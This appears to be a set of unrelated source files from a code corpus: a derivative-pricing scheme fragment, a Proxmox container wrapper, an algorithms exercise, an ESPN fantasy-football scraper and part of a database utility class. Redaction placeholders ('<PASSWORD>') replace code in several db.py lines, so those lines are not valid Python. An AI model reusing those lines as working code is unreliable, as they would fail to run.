- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
# Regression functions and parameters
sorting_method = "Geometric Intrinsic Value"
basis = "Geometric Intrinsic Value"
basis_order = 2
no_of_regression = 1 + 5 + 1 + 5
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(1,6):
rec[:, i] = delta[:, i-1]
rec[:, 6] = adjusted_derivative.reshape(-1)
for i in range(7,12):
rec[:, i] = adjusted_delta[:, i-7]
return rec
# Reference Solution
reference_riskfree = False
refererce_adjust = False
Example = ArithmeticBasketPut(5)
| 2.46875 | 2 |
proxmoxmanager/utils/classes/containers.py | igorlitvak/proxmoxmanager | 0 | 12797502 | from ..api import APIWrapper
from .nodes import ProxmoxNode, ProxmoxNodeDict
from .users import ProxmoxUser
from typing import Dict, List, Tuple, Any, Union
class ProxmoxContainer:
def __init__(self, api: APIWrapper, vmid: str, node: str):
self._api = api
self._vmid = vmid
self._node = node
@property
def id(self) -> str:
"""
:return: Unique ID of container (get-only)
"""
return self._vmid
@property
def node(self) -> ProxmoxNode:
"""
:return: Node on which containers is located (get-only)
"""
return ProxmoxNode(self._api, self._node)
def get_status_report(self) -> Dict[str, Any]:
"""
Get detailed status info about this container
:return: Container info in JSON-like format
"""
return self._api.get_container_status(node=self._node, vmid=self._vmid)
def get_config(self) -> Dict[str, Any]:
"""
Get detailed config
:return: Container config in JSON-like format
"""
return self._api.get_container_config(node=self._node, vmid=self._vmid)
def running(self) -> bool:
"""
Whether container is currently running
:return: True/False
"""
config = self.get_status_report()
return "status" in config.keys() and config["status"] == "running"
def is_template(self) -> bool:
"""
Whether this container is a template
:return: True/False
"""
config = self.get_config()
return "template" in config.keys() and config["template"] == 1
def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None,
full: bool = True) -> str:
"""
Clone LXC container
:param newid: ID of new LXC (integer number 100-999999999)
:param newnode: New node ID or ProxmoxNode object (optional)
:param name: Name of new LXC (optional)
:param full: Whether to make storage unlinked (note that linked might not be supported) (optional, default=True)
:return: ID of cloning task
"""
try:
newid = int(newid)
except ValueError:
raise ValueError("ID of container should be an integer between 100 and 999999999")
if newid < 100 or newid > 999_999_999:
raise ValueError("ID of container should be an integer between 100 and 999999999")
newid = str(newid)
kwargs = {"newid": newid, "node": self._node, "vmid": self._vmid, "full": '1' if full else '0'}
if newnode is not None:
if isinstance(newnode, ProxmoxNode):
newnode = newnode.id
kwargs["target"] = newnode
if name is not None:
kwargs["hostname"] = name
return self._api.clone_container(**kwargs)
def delete(self) -> str:
"""
Delete this container
:return: ID of deleting task
"""
return self._api.delete_container(node=self._node, vmid=self._vmid)
def start(self) -> str:
"""
Start container
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.start_container(**kwargs)
def stop(self) -> str:
"""
Stop container (unsafely)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.stop_container(**kwargs)
def shutdown(self, timeout: int = None, force_stop: bool = True) -> str:
"""
Shutdown container (safely)
:param timeout: Number of seconds to wait (optional)
:param force_stop: Whether to stop a container if shutdown failed (optional, default=True)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid, "forceStop": '1' if force_stop else '0'}
if timeout is not None:
kwargs["timeout"] = str(timeout)
return self._api.shutdown_container(**kwargs)
def reboot(self, timeout: int = None) -> str:
"""
Reboot container (safely)
:param timeout: Number of seconds to wait (optional)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
if timeout is not None:
kwargs["timeout"] = str(timeout)
return self._api.reboot_container(**kwargs)
def suspend(self) -> str:
"""
Suspend container
WARNING: doesn't appear in Proxmox GUI and probably never works
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.suspend_container(**kwargs)
def resume(self) -> str:
"""
Resume container
WARNING: doesn't appear in Proxmox GUI and probably never works
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.resume_container(**kwargs)
def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]:
"""
Get a list of users with permissions for this container and their roles
:return: List of tuples of ProxmoxUser objects and string names of roles
"""
path = "/vms/" + self._vmid
resp = self._api.get_access_control_list()
return [(ProxmoxUser(self._api, el["ugid"].split("@")[0]), el["roleid"]) for el in resp if
el["path"] and el["type"] == "user" and el["ugid"].split("@")[1] == "pve" and el["path"] == path]
def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:
"""
Add new permission for this container
:param user: User ID or ProxmoxUser object
:param role: String name of the role
:return: None
"""
path = "/vms/" + self._vmid
if isinstance(user, ProxmoxUser):
user = user.id
self._api.update_access_control_list(path=path, roles=role, users=user + "@pve", delete="0", propagate="0")
def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:
"""
Remove permission for this container
:param user: User ID or ProxmoxUser object
:param role: String name of the role
:return: None
"""
path = "/vms/" + self._vmid
if isinstance(user, ProxmoxUser):
user = user.id
self._api.update_access_control_list(path=path, roles=role, users=user + "@pve", delete="1", propagate="0")
def remove_all_permissions(self) -> None:
"""
Remove all permissions for this container for all users with any role
:return: None
"""
for user, permission in self.view_permissions():
self.remove_permission(user, permission)
def __repr__(self):
return f"<{self.__class__.__name__}: {self._vmid}>"
def __str__(self):
return self._vmid
def __eq__(self, other: 'ProxmoxContainer'):
return self._vmid == other._vmid and self._node == other._node
class ProxmoxContainerDict:
def __init__(self, api: APIWrapper):
self._api = api
self._containers: Dict[str, ProxmoxContainer] = {}
def keys(self):
self._get_containers()
return self._containers.keys()
def values(self):
self._get_containers()
return self._containers.values()
def items(self):
self._get_containers()
return self._containers.items()
def remove(self, vmid: Union[str, int]) -> None:
"""
Remove container by ID
:param vmid: Container ID
:return: None
"""
vmid = str(vmid)
self._get_containers()
self._containers[vmid].delete()
def __len__(self):
self._get_containers()
return len(self._containers)
def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer:
key = str(key)
self._get_containers()
return self._containers[key]
def __iter__(self):
self._get_containers()
return iter(self._containers)
def __repr__(self):
self._get_containers()
return f"<{self.__class__.__name__}: {repr(self._containers)}>"
def _get_containers(self):
containers = []
for node in ProxmoxNodeDict(self._api).keys():
resp = self._api.list_containers(node)
containers += [ProxmoxContainer(self._api, str(cont["vmid"]), node) for cont in resp]
self._containers = {cont.id: cont for cont in containers}
| 2.328125 | 2 |
1-6 Algorithmic Toolbox/Week 6/6-3 placing_parentheses.py | MLunov/Data-Structures-and-Algorithms-Specialization-San-Diego-HSE | 0 | 12797503 | # Uses python3
def evalt(a, b, op):
if op == '+':
return a + b
elif op == '-':
return a - b
elif op == '*':
return a * b
else:
assert False
def MinAndMax(i, j):
MIN = float('inf')
MAX = float('-inf')
for k in range(i, j):
a = evalt(M[i][k], M[k + 1][j], op[k - 1])
b = evalt(M[i][k], m[k + 1][j], op[k - 1])
c = evalt(m[i][k], M[k + 1][j], op[k - 1])
d = evalt(m[i][k], m[k + 1][j], op[k - 1])
MIN = min(MIN, a, b, c, d)
MAX = max(MAX, a, b, c, d)
return (MIN, MAX)
dataset = list(input())
digits = [int(dataset[i]) for i in range(0, len(dataset), 2)]
op = [dataset[i] for i in range(1, len(dataset), 2)]
m, M, n = [], [], len(digits)
for i in range(n + 1):
m.append([])
M.append([])
for j in range(n + 1):
m[i].append(0)
M[i].append(0)
for i in range(1, n + 1):
m[i][i], M[i][i] = digits[i - 1], digits[i - 1]
for s in range(1, n):
for i in range(1, n + 1 - s):
j = i + s
m[i][j], M[i][j] = MinAndMax(i, j)
# print(m)
# print(M)
print(M[1][n])
| 3.15625 | 3 |
nfl/espn.py | sansbacon/nfl | 2 | 12797504 | """
# espn.py
# classes for scraping, parsing espn football data
# this does include some basic fantasy data
# espn_fantasy is mostly about managing fantasy teams
# NOTE: trouble accessing data in offseason
# will have to revisit this module as season approaches
"""
import logging
import re
from bs4 import BeautifulSoup, NavigableString, Tag
from namematcher.xref import Site
from sportscraper.scraper import RequestScraper
FANTASY_TEAMS = {
1: "Atl",
2: "Buf",
3: "Chi",
4: "Cin",
5: "Cle",
6: "Dal",
7: "Den",
8: "Det",
9: "GB",
10: "Ten",
11: "Ind",
12: "KC",
13: "Oak",
14: "LAR",
15: "Mia",
16: "Min",
17: "NE",
18: "NO",
19: "NYG",
20: "NYJ",
21: "Phi",
22: "Ari",
23: "Pit",
24: "LAC",
25: "SF",
26: "Sea",
27: "TB",
28: "Wsh",
29: "Car",
30: "Jax",
33: "Bal",
34: "Hou",
}
class Scraper(RequestScraper):
"""
Scrape ESPN.com for football stats
"""
@staticmethod
def _check_pos(pos):
"""
Makes sure pos is valid and uppercase
Args:
pos(str):
Returns:
str
"""
if pos in [
"qb",
"rb",
"wr",
"te",
"dst",
"d/st",
"k",
"QB",
"RB",
"WR",
"TE",
"K",
"D/ST",
"DST",
]:
if pos in ["DST", "dst"]:
pos = "D/ST"
return pos.upper()
else:
raise ValueError("invalid position: {}".format(pos))
def adp(self, season_year):
"""
Gets adp data
Args:
season_year(int): 2019, etc.
Returns:
dict: parsed JSON
"""
url = (
f"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/"
f"segments/0/leaguedefaults/1?view=kona_player_info"
)
return self.get_json(url)
def players_position(self, pos):
"""
Gets page with all players by position
Args:
pos(str): qb, rb, wr, te, k, etc.
Returns:
str
"""
url = "http://www.espn.com/nfl/players?position={}&league=nfl"
return self.get(url.format(pos), encoding="latin1")
def projections(self, pos, season_year=None, week=0, offset=0):
"""
Gets page with projections by position
Args:
pos: str qb, rb, wr, te, k, etc.
season_year: int 2017, 2016
week: int 1, 2, 3
offset: int 0, 40, 80, etc.
Returns:
HTML string
TODO: revise based on new URL
"""
pos = pos.lower()
slot_categories = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
max_offset = {"qb": 120, "rb": 240, "wr": 360, "te": 160, "dst": 0, "k": 40}
if pos not in slot_categories.keys():
raise ValueError("invalid pos {}".format(pos))
if offset > max_offset.get(pos):
raise ValueError("invalid offset {}".format(offset))
if offset % 40 > 0:
raise ValueError("invalid offset {}".format(offset))
# https://fantasy.espn.com/football/players/projections
url = "http://games.espn.com/ffl/tools/projections?"
if season_year:
params = {
"slotCategoryId": slot_categories[pos],
"startIndex": offset,
"seasonId": season_year,
}
else:
params = {"slotCategoryId": slot_categories[pos], "startIndex": offset}
if week:
params["scoringPeriodId"] = week
else:
params["seasonTotals"] = "true"
return self.get(url, params=params, encoding="latin1")
def team_roster(self, team_code):
"""
Gets list of NFL players from ESPN.com
Args:
team_code: str 'DEN', 'BUF', etc.
Returns:
HTML string
"""
url = f"http://www.espn.com/nfl/team/roster/_/name/{team_code}"
return self.get(url, encoding="latin1")
def weekly_scoring(self, season_year, week, position):
"""
Gets weekly fantasy scoring page
Args:
season_year (int): 2017, 2016, etc.
week (int): 1 through 17
position (str): 'qb', 'wr', etc.
Returns:
str: HTML
TODO: rework for new URL
"""
poscode = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
if position.lower() not in poscode:
raise ValueError("invalid position: {}".format(position))
# https://fantasy.espn.com/football/leaders
url = "http://games.espn.com/ffl/leaders?&"
params = {
"scoringPeriodId": week,
"seasonId": season_year,
"slotCategoryId": position,
}
return self.get(url, params=params)
class Parser:
"""
Parse ESPN.com for football stats
"""
def __init__(self):
"""
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
@staticmethod
def _val(val):
"""
Converts non-numeric value to numeric 0
Args:
val:
Returns:
number
"""
if "--" in val:
return 0
return val
@staticmethod
def adp(content):
"""
Parses season-long ADP
Args:
content:
Returns:
list of dict
"""
vals = []
for item in content["players"]:
tl_wanted = [
"defaultPositionId",
"firstName",
"id",
"lastName",
"proTeamId",
]
api_player = {k: v for k, v in item["player"].items() if k in tl_wanted}
for scoring_type in ["PPR", "STANDARD"]:
for rank_type in ["rank", "auctionValue"]:
key = scoring_type.lower() + "_" + rank_type
try:
api_player[key] = item["player"]["draftRanksByRankType"][
scoring_type
][rank_type]
except KeyError:
api_player[key] = None
vals.append(api_player)
return vals
def projections(self, content, pos):
"""
Parses ESPN fantasy football season-long sortable projections page
Args:
content: HTML string
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
if pos.lower() in ["qb", "rb", "wr", "te", "flex"]:
headers = [
"pass_att",
"pass_cmp",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec",
"rec_yds",
"rec_td",
"fantasy_points_ppr",
]
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
vals = [self._val(td.text) for td in tds[3:]]
for header, val in zip(headers, tds[2].text.split("/") + vals):
player[header] = val
players.append(player)
elif pos.lower() == "k":
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
player["fantasy_points_ppr"] = self._val(tds[-1].text)
players.append(player)
else:
pass
return players
@staticmethod
def players_position(content, pos):
"""
Parses page of ESPN players by position
Args:
content:
pos:
Returns:
list: of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
class_matches = set(["oddrow", "evenrow"])
classes = set(row.attrs.get("class", []))
if class_matches.intersection(classes):
player = {"source": "espn", "source_player_position": pos}
tds = row.find_all("td")
# tds[0]: <a href="http://www.espn.com/nfl/player/_/id/
# 2574511/brandon-allen"><NAME></a>
player["source_player_name"] = tds[0].text
link = row.find("a", {"href": re.compile(r"/player/_/")})
if link:
match = re.search(r"\/id\/([0-9]+)", link["href"])
if match:
player["source_player_id"] = match.group(1)
# tds[1]: <td><a href="http://www.espn.com/nfl/team/_/
# name/jax/jacksonville-jaguars"><NAME></a></td>
player["source_team_name"] = tds[1].text
link = row.find("a", {"href": re.compile(r"/team/_/name")})
if link:
match = re.search(r"name/(\w+)/", link["href"])
if match:
player["source_team_code"] = match.group(1)
# tds[2]: <td>Arkansas</td>
player["college"] = tds[2].text
# add to list
players.append(player)
return players
@staticmethod
def team_roster(content):
"""
Parses team roster page into list of player dict
Args:
content: HTML of espn nfl team roster page
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
link = row.find("a", {"href": re.compile(r"/nfl/player/_/id/")})
try:
player = {"source": "espn"}
tds = row.find_all("td")
if len(tds) != 8:
continue
player["source_player_position"] = tds[2].text
player["source_player_name"] = link.text
player["source_player_id"] = link["href"].split("/")[-2]
players.append(player)
except ValueError:
pass
return players
@staticmethod
def weekly_scoring(content):
"""
Parses weekly scoring page
Args:
content (str): HTML
Returns:
list: of dict
"""
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_dst(content):
"""
Parses weekly scoring page for dst
Args:
content(str): HTML
Returns:
list: of dict
"""
# TODO: adapt for dst
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_k(content):
"""
Parses weekly scoring page for kickers
Args:
content (str): HTML
Returns:
list: of dict
"""
# TODO: adapt for kicker
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
class Agent:
"""
Combines common scraping/parsing tasks
"""
def __init__(self, scraper=None, parser=None, cache_name="espn-agent"):
"""
Creates Agent object
Args:
scraper(espn.Scraper): default None
parser(espn.Parser): default None
cache_name(str): default 'espn-agent'
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
if scraper:
self._s = scraper
else:
self._s = Scraper(cache_name=cache_name)
if parser:
self._p = parser
else:
self._p = Parser()
def adp(self, season_year):
"""
Gets season ADP data
Args:
season_year(int): 2018, 2019, etc.
Returns:
list: of dict
"""
content = self._s.adp(season_year)
return self._p.adp(content)
class Xref(Site):
"""
Cross-reference source players with other names/ids
"""
def __init__(self, source_name="espn"):
"""
Args:
source_name(str): either 'espn' or 'espn_fantasy'
"""
super().__init__()
self.source_name = source_name
if __name__ == "__main__":
pass
| 3.15625 | 3 |
IronManFly/storage/db/db.py | leepand/IronManFly | 599 | 12797505 | <filename>IronManFly/storage/db/db.py
import threading
import glob
import gzip
try:
from StringIO import StringIO # Python 2.7
except:
from io import StringIO # Python 3.3+
import uuid
import re
import os
import sys
from collections import defaultdict
import pandas as pd
import pybars
from .column import Column, ColumnSet
from .table import Table, TableSet
from .s3 import S3
from .utils import profile_path, load_profile, load_from_json, dump_to_json
from .query_templates import query_templates
# attempt to import the relevant database libraries
# TODO: maybe add warnings?
try:
import psycopg2 as pg
HAS_PG = True
except ImportError:
HAS_PG = False
try:
import MySQLdb
mysql_connect = MySQLdb.connect
HAS_MYSQL = True
except ImportError:
try:
import pymysql
mysql_connect = pymysql.connect
HAS_MYSQL = True
except ImportError:
HAS_MYSQL = False
try:
import sqlite3 as sqlite
HAS_SQLITE = True
except ImportError:
HAS_SQLITE = False
try:
import pyodbc as pyo
HAS_ODBC = True
except ImportError:
try:
import pypyodbc as pyo
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
try:
import pymssql
HAS_PYMSSQL = True
except ImportError:
HAS_PYMSSQL = False
DBPY_PROFILE_ID = ".db.py_"
S3_PROFILE_ID = ".db.py_s3_"
class DB(object):
"""
Utility for exploring and querying a database.
Parameters
----------
username: str
Your username for the database
password: str
Your password for the database
hostname: str
Hostname your database is running on (i.e. "localhost", "10.20.1.248")
port: int
Port the database is running on. defaults to default port for db.
portgres: 5432
redshift: 5439
mysql: 3306
sqlite: n/a
mssql: 1433
filename: str
path to sqlite database
dbname: str
Name of the database
schemas: list
List of schemas to include. Defaults to all.
profile: str
Preconfigured database credentials / profile for how you like your queries
exclude_system_tables: bool
Whether or not to include "system" tables (the ones that the database needs
in order to operate). This includes things like schema definitions. Most of
you probably don't need this, but if you're a db admin you might actually
want to query the system tables.
limit: int, None
Default number of records to return in a query. This is used by the DB.query
method. You can override it by adding limit={X} to the `query` method, or
by passing an argument to `DB()`. None indicates that there will be no
limit (That's right, you'll be limitless. Bradley Cooper style.)
keys_per_column: int, None
Default number of keys to display in the foreign and reference keys.
This is used to control the rendering of PrettyTable a bit. None means
that you'll have verrrrrrrry wide columns in some cases.
driver: str, None
Driver for mssql/pyodbc connections.
Examples
--------
db = DB(dbname="AdventureWorks2012", dbtype="mssql", driver="{FreeTDS}")
from db import DB
try:
__import__('imp').find_module('psycopg2')
db = DB(username="kermit", password="<PASSWORD>", hostname="themuppets.com", port=5432, dbname="muppets", dbtype="postgres")
db = DB(username="dev", hostname="localhost", port=5432, dbname="devdb", dbtype="postgres")
db = DB(username="fozzybear", password="<PASSWORD>", hostname="ec2.523.24.131", port=5432, dbname="muppets_redshift", dbtype="redshift")
except ImportError:
pass
try:
__import__('imp').find_module('pymysql')
db = DB(username="root", hostname="localhost", dbname="employees", dbtype="mysql")
db = DB(filename="/path/to/mydb.sqlite", dbtype="sqlite")
except ImportError:
pass
"""
def __init__(self, username=None, password=<PASSWORD>, hostname="localhost",
port=None, filename=None, dbname=None, dbtype=None, schemas=None,
profile="default", exclude_system_tables=True, limit=1000,
keys_per_column=None, driver=None, cache=False):
if port is None:
if dbtype=="postgres":
port = 5432
elif dbtype=="redshift":
port = 5439
elif dbtype=="mysql":
port = 3306
elif dbtype=="sqlite":
port = None
elif dbtype=="mssql":
port = 1433
elif profile is not None:
pass
else:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._use_cache = cache
if dbtype not in ("sqlite", "mssql") and username is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
elif dbtype=="sqlite" and filename is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
else:
self.username = username
self.password = password
self.hostname = hostname
self.port = port
self.filename = filename
self.dbname = dbname
self.dbtype = dbtype
self.schemas = schemas
self.limit = limit
self.keys_per_column = keys_per_column
self.driver = driver
if self.dbtype is None:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._query_templates = query_templates.get(self.dbtype).queries
if self.dbtype=="postgres" or self.dbtype=="redshift":
if not HAS_PG:
raise Exception("Couldn't find psycopg2 library. Please ensure it is installed")
self.con = pg.connect(user=self.username, password=self.password,
host=self.hostname, port=self.port, dbname=self.dbname)
self.con.autocommit = True
self.cur = self.con.cursor()
elif self.dbtype=="sqlite":
if not HAS_SQLITE:
raise Exception("Couldn't find sqlite library. Please ensure it is installed")
self.con = sqlite.connect(self.filename)
self.cur = self.con.cursor()
self._create_sqlite_metatable()
elif self.dbtype=="mysql":
if not HAS_MYSQL:
raise Exception("Couldn't find MySQLdb or pymysql library. Please ensure it is installed")
creds = {}
for arg in ["username", "password", "hostname", "port", "dbname"]:
if getattr(self, arg):
value = getattr(self, arg)
if arg=="username":
arg = "user"
elif arg=="password":
arg = "<PASSWORD>"
elif arg=="dbname":
arg = "db"
elif arg=="hostname":
arg = "host"
creds[arg] = value
self.con = mysql_connect(**creds)
self.con.autocommit(True)
self.cur = self.con.cursor()
elif self.dbtype=="mssql":
if not HAS_ODBC and not HAS_PYMSSQL:
raise Exception("Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed")
if HAS_ODBC:
base_con = "Driver={driver};Server={server};Database={database};".format(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
database=self.dbname or ''
)
conn_str = ((self.username and self.password) and "{}{}".format(
base_con,
"User Id={username};Password={password};".format(
username=self.username,
password=self.password
)
) or "{}{}".format(base_con, "Trusted_Connection=Yes;"))
try:
self.con = pyo.connect(conn_str)
self.cur = self.con.cursor()
except:
self.con = pyo.connect(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
port=self.port,
database=self.dbname or '',
uid=self.username,
pwd=<PASSWORD>)
self.cur = self.con.cursor()
elif HAS_PYMSSQL:
if '\\' in self.hostname:
hostname = self.hostname
elif hasattr(self, 'port'):
hostname = '{0}:{1}'.format(self.hostname, self.port)
else:
hostname = self.hostname
self.con = pymssql.connect(host=hostname,
user=self.username,
password=<PASSWORD>,
database=self.dbname)
self.cur = self.con.cursor()
self._tables = TableSet([])
self._exclude_system_tables = exclude_system_tables
self.handlebars = pybars.Compiler()
@property
def tables(self):
"""A lazy loaded reference to the table metadata for the DB."""
if len(self._tables) == 0:
self.refresh_schema(self._exclude_system_tables, self._use_cache)
return self._tables
def __str__(self):
return "DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}".format(
dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)
def __repr__(self):
return self.__str__()
def __delete__(self):
del self.cur
del self.con
def load_credentials(self, profile="default"):
"""
Loads crentials for a given profile. Profiles are stored in
~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not
to say this a secure way to store sensitive data, but it will probably
stop your little sister from stealing your passwords.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
"""
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
creds = load_from_json(f)
self.username = creds.get('username')
self.password = creds.get('password')
self.hostname = creds.get('hostname')
self.port = creds.get('port')
self.filename = creds.get('filename')
self.dbname = creds.get('dbname')
self.dbtype = creds.get('dbtype')
self.schemas = creds.get('schemas')
self.limit = creds.get('limit')
self.keys_per_column = creds.get('keys_per_column')
else:
raise Exception("Credentials not configured!")
def save_credentials(self, profile="default"):
"""
Save your database credentials so you don't have to save them in script.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
from db import DB
import pymysql
db = DB(username="hank", password="<PASSWORD>", hostname="prod.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="production")
db = DB(username="hank", password="<PASSWORD>", hostname="staging.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="staging")
db = DB(profile="staging")
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.save_credentials(profile='test')
"""
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.credentials)
@staticmethod
def load_metadata(profile="default"):
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
prof = load_from_json(f)
return prof.get('tables', None)
def save_metadata(self, profile="default"):
"""Save the database credentials, plus the database properties to your db.py profile."""
if len(self.tables) > 0:
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.to_dict())
@property
